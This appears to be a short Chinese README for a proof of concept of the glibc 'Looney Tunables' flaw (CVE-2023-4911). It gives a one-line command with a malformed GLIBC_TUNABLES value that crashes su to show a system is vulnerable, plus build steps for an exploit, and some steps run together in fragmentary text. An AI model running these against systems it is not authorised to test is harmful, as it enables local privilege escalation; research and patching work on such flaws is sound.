这是一个 CVE-2023-4911(又名 "Looney Tunables")的 PoC,利用 glibc 动态加载器中 GLIBC_TUNABLES 环境变量解析函数 parse_tunables() 的漏洞。
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped),则说明目标存在漏洞。libc.so.6 文件python3 libc.py
gcc exp.c -o exp
此存储库中提供的所有代码仅用于教育/研究目的。与此存储库中包含的材料相关的任何行为和/或活动均由您自行负责。滥用此存储库中的代码可能导致相关人员受到刑事指控。对于任何滥用此存储库中的代码违反法律的个人,作者不承担任何责任。